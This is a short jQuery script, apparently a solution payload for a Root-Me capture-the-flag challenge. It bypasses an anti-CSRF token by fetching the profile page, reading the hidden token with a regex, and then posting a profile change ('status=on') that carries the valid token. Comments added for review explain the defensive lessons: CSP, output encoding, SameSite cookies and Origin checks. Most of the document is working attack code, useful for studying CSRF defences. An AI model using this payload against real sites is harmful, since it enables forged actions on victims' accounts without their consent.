- <script src="http://code.jquery.com/jquery-1.11.0.min.js"></script>
- <script>
/**
 * Step 1 of the sequence: POST an empty body to the challenge's profile
 * endpoint and pass the response text to extractToken.
 *
 * NOTE(review): the response is only readable where the browser exposes it
 * to this script. Presumably the script is meant to run inside the
 * application's own origin; the paste does not say where it is hosted.
 *
 * Defensive takeaway: a per-form anti-CSRF token does not stop script that
 * can read the form. The fix is at whatever lets foreign script run in, or
 * read from, the origin: output encoding, a Content-Security-Policy, and no
 * permissive CORS on authenticated pages.
 */
function start() {
  var profileRequest = {
    type: 'POST',
    url: 'http://challenge01.root-me.org/web-client/ch23/index.php?action=profile',
    contentType: 'application/x-www-form-urlencoded;charset=utf-8',
    // 'text' keeps jQuery from parsing the body; the callback gets the raw HTML.
    dataType: 'text',
    data: '',
    success: extractToken
  };

  $.ajax(profileRequest);
}
/**
 * Step 2: find the hidden "token" input in the profile page markup and
 * forward its value to makeCSRF.
 *
 * @param {string} response - Raw HTML returned by the profile request.
 */
function extractToken(response) {
  var tokenField = new RegExp('<input id="token" type="hidden" name="token" value="(.*)" />', 'gi');

  // With the g flag, match() returns whole matches and no capture groups,
  // so the capture is read from the legacy RegExp.$1 static instead.
  // RegExp.$1 reflects the last successful match, so if the field is
  // absent the value forwarded below is not taken from this response.
  response.match(tokenField);
  var token = RegExp.$1;

  makeCSRF(token);
}
/**
 * Step 3: submit the profile form fields together with the token taken from
 * the page, so the request carries the value the server-side check expects.
 *
 * NOTE(review): what `status=on` changes on the account is not shown in this
 * paste.
 *
 * Defensive takeaway: the token is valid, so token validation alone cannot
 * reject this request. Layered controls for state-changing endpoints are
 * SameSite cookies, Origin/Referer validation, and re-authentication for
 * sensitive profile changes.
 *
 * @param {string} token - Value captured by extractToken; appended verbatim.
 */
function makeCSRF(token) {
  var formBody = 'username=shoxx&status=on&token=' + token;

  $.ajax({
    type: "POST",
    url: "http://challenge01.root-me.org/web-client/ch23/index.php?action=profile",
    data: formBody
  });
}
// Start the sequence two seconds after this script is evaluated.
// The string argument is compiled and run as code, the same way eval() is.
setTimeout('start()', 2 * 1000);
- </script>